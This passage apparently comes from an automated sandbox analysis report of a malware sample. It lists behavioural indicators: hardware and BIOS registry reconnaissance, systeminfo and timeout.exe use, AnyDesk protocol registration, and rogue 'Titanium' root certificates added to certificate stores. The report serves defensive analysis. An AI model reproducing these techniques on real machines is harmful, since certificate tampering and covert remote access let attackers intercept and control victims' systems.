| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000a47b29fbd6f9c3720000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000a47b29fb0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900a47b29fb000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1da47b29fb000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000a47b29fb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\FuturesClient.exe = "11000" | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_CLIPCHILDREN_OPTIMIZATION | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_CLIPCHILDREN_OPTIMIZATION\FuturesClient.exe = "1" | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\AnyDesk\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" --play \"%1\"" | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" \"%1\"" | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings | C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3350944739-639801879-157714471-1000\{3A8DC9F9-B29E-48C5-A534-888D43A36AF1} | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\",0" | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00360031003600440043003200320039002d0037003500450035002d0034003100410039002d0039004400330042002d003000460034003600420046003700320032003200310043007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00360038004500310042004600430036002d0039003100300036002d0034004500460045002d0039003500360042002d003600440046003600360036003900450036003600300039007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340046004500410038004400320042002d0030004500410042002d0034004200460033002d0038003000300041002d003000450030004300320046004100340045003200320045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340030003900380043004100410032002d0042004600420031002d0034004400360032002d0038003900350043002d004600410031003700300036004200410042003300460037007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1